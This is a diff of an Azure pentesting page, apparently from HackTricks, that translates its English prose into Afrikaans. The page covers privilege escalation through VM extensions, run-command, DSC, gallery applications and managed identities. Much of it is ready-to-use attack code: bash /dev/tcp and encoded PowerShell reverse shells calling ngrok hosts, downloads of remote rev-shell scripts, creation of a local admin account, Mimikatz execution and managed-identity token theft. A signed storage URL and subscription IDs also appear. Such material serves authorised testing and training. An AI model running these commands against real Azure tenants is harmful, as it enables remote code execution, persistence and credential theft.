a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index 6d8ba6e74..2d3782cb0 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -1,10 +1,10 @@ -# Az - Virtual Machines & Network Privesc +# Az - Virtuele Masjiene & Netwerk Privesc {{#include ../../../banners/hacktricks-training.md}} -## VMS & Network +## VMS & Netwerk -For more info about Azure Virtual Machines and Network check: +Vir meer inligting oor Azure Virtuele Masjiene en Netwerk, kyk: {{#ref}} ../az-services/vms/ @@ -12,14 +12,13 @@ For more info about Azure Virtual Machines and Network check: ### **`Microsoft.Compute/virtualMachines/extensions/write`** -This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\ -Example abusing custom extensions to execute arbitrary commands in a VM: +Hierdie toestemming laat toe om uitbreidings in virtuele masjiene uit te voer wat toelaat om **arbitraire kode op hulle uit te voer**.\ +Voorbeeld van die misbruik van persoonlike uitbreidings om arbitraire opdragte in 'n VM uit te voer: {{#tabs }} {{#tab name="Linux" }} -- Execute a revers shell - +- Voer 'n terugshell uit ```bash # Prepare the rev shell echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64 @@ -27,120 +26,108 @@ YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== # Execute rev shell az vm extension set \ - --resource-group \ - --vm-name \ - --name CustomScript \ - --publisher Microsoft.Azure.Extensions \ - --version 2.1 \ - --settings '{}' \ - --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' +--resource-group \ +--vm-name \ +--name CustomScript \ +--publisher Microsoft.Azure.Extensions \ +--version 2.1 \ +--settings '{}' \ +--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' ``` - -- Execute a script located on the internet - +- Voer 'n skrip uit wat op die internet geleë is ```bash az vm extension set \ - --resource-group rsc-group> \ - --vm-name \ - --name CustomScript \ - --publisher Microsoft.Azure.Extensions \ - --version 2.1 \ - --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \ - --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}' +--resource-group rsc-group> \ +--vm-name \ +--name CustomScript \ +--publisher Microsoft.Azure.Extensions \ +--version 2.1 \ +--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \ +--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}' ``` - {{#endtab }} {{#tab name="Windows" }} -- Execute a reverse shell - +- Voer 'n omgekeerde skulp uit ```bash # Get encoded reverse shell echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 # Execute it az vm extension set \ - --resource-group \ - --vm-name \ - --name CustomScriptExtension \ - --publisher Microsoft.Compute \ - --version 1.10 \ - --settings '{}' \ - --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}' +--resource-group \ +--vm-name \ +--name CustomScriptExtension \ +--publisher Microsoft.Compute \ +--version 1.10 \ +--settings '{}' \ +--protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}' ``` - -- Execute reverse shell from file - +- Voer omgekeerde dop uit vanaf lêer ```bash az vm extension set \ - --resource-group \ - --vm-name \ - --name CustomScriptExtension \ - --publisher Microsoft.Compute \ - --version 1.10 \ - --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \ - --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}' +--resource-group \ +--vm-name \ +--name CustomScriptExtension \ +--publisher Microsoft.Compute \ +--version 1.10 \ +--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \ +--protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}' ``` +U kan ook ander payloads uitvoer soos: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add` -You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add` - -- Reset password using the VMAccess extension - +- Stel wagwoord weer in met behulp van die VMAccess-uitbreiding ```powershell # Run VMAccess extension to reset the password $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred ``` - {{#endtab }} {{#endtabs }} -It's also possible to abuse well-known extensions to execute code or perform privileged actions inside the VMs: +Dit is ook moontlik om bekende uitbreidings te misbruik om kode uit te voer of bevoorregte aksies binne die VM's te verrig:
-VMAccess extension - -This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs. +VMAccess uitbreiding +Hierdie uitbreiding maak dit moontlik om die wagwoord te wysig (of te skep as dit nie bestaan nie) van gebruikers binne Windows VM's. ```powershell # Run VMAccess extension to reset the password $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred ``` -
DesiredConfigurationState (DSC) -This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension: - +Dit is 'n **VM-uitbreiding** wat aan Microsoft behoort en PowerShell DSC gebruik om die konfigurasie van Azure Windows VM's te bestuur. Daarom kan dit gebruik word om **arbitraire opdragte** in Windows VM's deur hierdie uitbreiding uit te voer: ```powershell # Content of revShell.ps1 Configuration RevShellConfig { - Node localhost { - Script ReverseShell { - GetScript = { @{} } - SetScript = { - $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port); - $stream = $client.GetStream(); - [byte[]]$bytes = 0..65535|%{0}; - while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ - $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); - $sendback = (iex $data 2>&1 | Out-String ); - $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; - $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); - $stream.Write($sendbyte, 0, $sendbyte.Length) - } - $client.Close() - } - TestScript = { return $false } - } - } +Node localhost { +Script ReverseShell { +GetScript = { @{} } +SetScript = { +$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port); +$stream = $client.GetStream(); +[byte[]]$bytes = 0..65535|%{0}; +while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ +$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); +$sendback = (iex $data 2>&1 | Out-String ); +$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; +$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); +$stream.Write($sendbyte, 0, $sendbyte.Length) +} +$client.Close() +} +TestScript = { return $false } +} +} } RevShellConfig -OutputPath .\Output @@ -148,95 +135,91 @@ RevShellConfig -OutputPath .\Output $resourceGroup = 'dscVmDemo' $storageName = 'demostorage' Publish-AzVMDscConfiguration ` - -ConfigurationPath .\revShell.ps1 ` - -ResourceGroupName $resourceGroup ` - -StorageAccountName $storageName ` - -Force +-ConfigurationPath .\revShell.ps1 ` +-ResourceGroupName $resourceGroup ` +-StorageAccountName $storageName ` +-Force # Apply DSC to VM and execute rev shell $vmName = 'myVM' Set-AzVMDscExtension ` - -Version '2.76' ` - -ResourceGroupName $resourceGroup ` - -VMName $vmName ` - -ArchiveStorageAccountName $storageName ` - -ArchiveBlobName 'revShell.ps1.zip' ` - -AutoUpdate ` - -ConfigurationName 'RevShellConfig' +-Version '2.76' ` +-ResourceGroupName $resourceGroup ` +-VMName $vmName ` +-ArchiveStorageAccountName $storageName ` +-ArchiveBlobName 'revShell.ps1.zip' ` +-AutoUpdate ` +-ConfigurationName 'RevShellConfig' ``` -
-Hybrid Runbook Worker +Hibriede Runbook Werker -This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-services/az-automation-account/). +Dit is 'n VM-uitbreiding wat die uitvoering van runbooks in VM's vanuit 'n outomatiseringsrekening moontlik maak. Vir meer inligting, kyk na die [Outomatiseringsrekeninge diens](../az-services/az-automation-account/).
### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)` -These are the required permissions to **create a new gallery application and execute it inside a VM**. Gallery applications can execute anything so an attacker could abuse this to compromise VM instances executing arbitrary commands. +Dit is die vereiste toestemmings om **'n nuwe galerytoepassing te skep en dit binne 'n VM uit te voer**. Galerytoepassings kan enigiets uitvoer, so 'n aanvaller kan dit misbruik om VM-instanties te kompromitteer wat arbitrêre opdragte uitvoer. -The last 2 permissions might be avoided by sharing the application with the tenant. +Die laaste 2 toestemmings kan vermy word deur die toepassing met die huurder te deel. -Exploitation example to execute arbitrary commands: +Eksploitasiemvoorbeeld om arbitrêre opdragte uit te voer: {{#tabs }} {{#tab name="Linux" }} - ```bash # Create gallery (if the isn't any) az sig create --resource-group myResourceGroup \ - --gallery-name myGallery --location "West US 2" +--gallery-name myGallery --location "West US 2" # Create application container az sig gallery-application create \ - --application-name myReverseShellApp \ - --gallery-name myGallery \ - --resource-group \ - --os-type Linux \ - --location "West US 2" +--application-name myReverseShellApp \ +--gallery-name myGallery \ +--resource-group \ +--os-type Linux \ +--location "West US 2" # Create app version with the rev shell ## In Package file link just add any link to a blobl storage file az sig gallery-application version create \ - --version-name 1.0.2 \ - --application-name myReverseShellApp \ - --gallery-name myGallery \ - --location "West US 2" \ - --resource-group \ - --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ - --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ - --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ - --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" +--version-name 1.0.2 \ +--application-name myReverseShellApp \ +--gallery-name myGallery \ +--location "West US 2" \ +--resource-group \ +--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ +--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ +--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ +--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" # Install the app in a VM to execute the rev shell ## Use the ID given in the previous output az vm application set \ - --resource-group \ - --name \ - --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ - --treat-deployment-as-failure true +--resource-group \ +--name \ +--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ +--treat-deployment-as-failure true ``` - {{#endtab }} {{#tab name="Windows" }} - ```bash # Create gallery (if the isn't any) az sig create --resource-group \ - --gallery-name myGallery --location "West US 2" +--gallery-name myGallery --location "West US 2" # Create application container az sig gallery-application create \ - --application-name myReverseShellAppWin \ - --gallery-name myGallery \ - --resource-group \ - --os-type Windows \ - --location "West US 2" +--application-name myReverseShellAppWin \ +--gallery-name myGallery \ +--resource-group \ +--os-type Windows \ +--location "West US 2" # Get encoded reverse shell echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 @@ -245,59 +228,55 @@ echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",1 ## In Package file link just add any link to a blobl storage file export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" az sig gallery-application version create \ - --version-name 1.0.0 \ - --application-name myReverseShellAppWin \ - --gallery-name myGallery \ - --location "West US 2" \ - --resource-group \ - --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ - --install-command "powershell.exe -EncodedCommand $encodedCommand" \ - --remove-command "powershell.exe -EncodedCommand $encodedCommand" \ - --update-command "powershell.exe -EncodedCommand $encodedCommand" +--version-name 1.0.0 \ +--application-name myReverseShellAppWin \ +--gallery-name myGallery \ +--location "West US 2" \ +--resource-group \ +--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ +--install-command "powershell.exe -EncodedCommand $encodedCommand" \ +--remove-command "powershell.exe -EncodedCommand $encodedCommand" \ +--update-command "powershell.exe -EncodedCommand $encodedCommand" # Install the app in a VM to execute the rev shell ## Use the ID given in the previous output az vm application set \ - --resource-group \ - --name deleteme-win4 \ - --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \ - --treat-deployment-as-failure true +--resource-group \ +--name deleteme-win4 \ +--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \ +--treat-deployment-as-failure true ``` - {{#endtab }} {{#endtabs }} ### `Microsoft.Compute/virtualMachines/runCommand/action` -This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:** +Dit is die mees basiese meganisme wat Azure bied om **arbitraire opdragte in VM's uit te voer:** {{#tabs }} {{#tab name="Linux" }} - ```bash # Execute rev shell az vm run-command invoke \ - --resource-group \ - --name \ - --command-id RunShellScript \ - --scripts @revshell.sh +--resource-group \ +--name \ +--command-id RunShellScript \ +--scripts @revshell.sh # revshell.sh file content echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh ``` - {{#endtab }} {{#tab name="Windows" }} - ```bash # The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action # Execute a rev shell az vm run-command invoke \ - --resource-group Research \ - --name juastavm \ - --command-id RunPowerShellScript \ - --scripts @revshell.ps1 +--resource-group Research \ +--name juastavm \ +--command-id RunPowerShellScript \ +--scripts @revshell.ps1 ## Get encoded reverse shell echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 @@ -314,62 +293,57 @@ echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1 Import-module MicroBurst.psm1 Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt ``` - {{#endtab }} {{#endtabs }} ### `Microsoft.Compute/virtualMachines/login/action` -This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM). +Hierdie toestemming laat 'n gebruiker toe om **in te log as gebruiker in 'n VM via SSH of RDP** (solank Entra ID-outeentiging in die VM geaktiveer is). -Login via **SSH** with **`az ssh vm --name --resource-group `** and via **RDP** with your **regular Azure credentials**. +Teken in via **SSH** met **`az ssh vm --name --resource-group `** en via **RDP** met jou **gereelde Azure-akkrediteerings**. ### `Microsoft.Compute/virtualMachines/loginAsAdmin/action` -This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM). +Hierdie toestemming laat 'n gebruiker toe om **in te log as gebruiker in 'n VM via SSH of RDP** (solank Entra ID-outeentiging in die VM geaktiveer is). -Login via **SSH** with **`az ssh vm --name --resource-group `** and via **RDP** with your **regular Azure credentials**. +Teken in via **SSH** met **`az ssh vm --name --resource-group `** en via **RDP** met jou **gereelde Azure-akkrediteerings**. ## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -All those are the necessary permissions to **create a VM with a specific managed identity** and leaving a **port open** (22 in this case). This allows a user to create a VM and connect to it and **steal managed identity tokens** to escalate privileges to it. - -Depending on the situation more or less permissions might be needed to abuse this technique. +Al hierdie is die nodige toestemmings om **'n VM met 'n spesifieke bestuurde identiteit te skep** en 'n **poort oop te laat** (22 in hierdie geval). Dit laat 'n gebruiker toe om 'n VM te skep en daaraan te koppel en **bestuurde identiteitstokens te steel** om voorregte na dit te eskaleer. +Afhangende van die situasie mag meer of minder toestemmings benodig word om hierdie tegniek te misbruik. ```bash az vm create \ - --resource-group Resource_Group_1 \ - --name cli_vm \ - --image Ubuntu2204 \ - --admin-username azureuser \ - --generate-ssh-keys \ - --assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \ - --nsg-rule ssh \ - --location "centralus" +--resource-group Resource_Group_1 \ +--name cli_vm \ +--image Ubuntu2204 \ +--admin-username azureuser \ +--generate-ssh-keys \ +--assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \ +--nsg-rule ssh \ +--location "centralus" # By default pub key from ~/.ssh is used (if none, it's generated there) ``` - ### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. It can have the **system assigned one**, and **many user managed identities**.\ -Then, from the metadata service it's possible to generate tokens for each one. - +Daardie toestemmings is genoeg om **nuwe bestuurde identiteite aan 'n VM toe te ken**. Let daarop dat 'n VM verskeie bestuurde identiteite kan hê. Dit kan die **stelselt toegekende een** hê, en **baie gebruikersbestuurde identiteite**.\ +Dan is dit moontlik om tokens vir elkeen te genereer vanaf die metadata-diens. ```bash # Get currently assigned managed identities to the VM az vm identity show \ - --resource-group \ - --name +--resource-group \ +--name # Assign several managed identities to a VM az vm identity assign \ - --resource-group \ - --name \ - --identities \ - /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \ - /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2 +--resource-group \ +--name \ +--identities \ 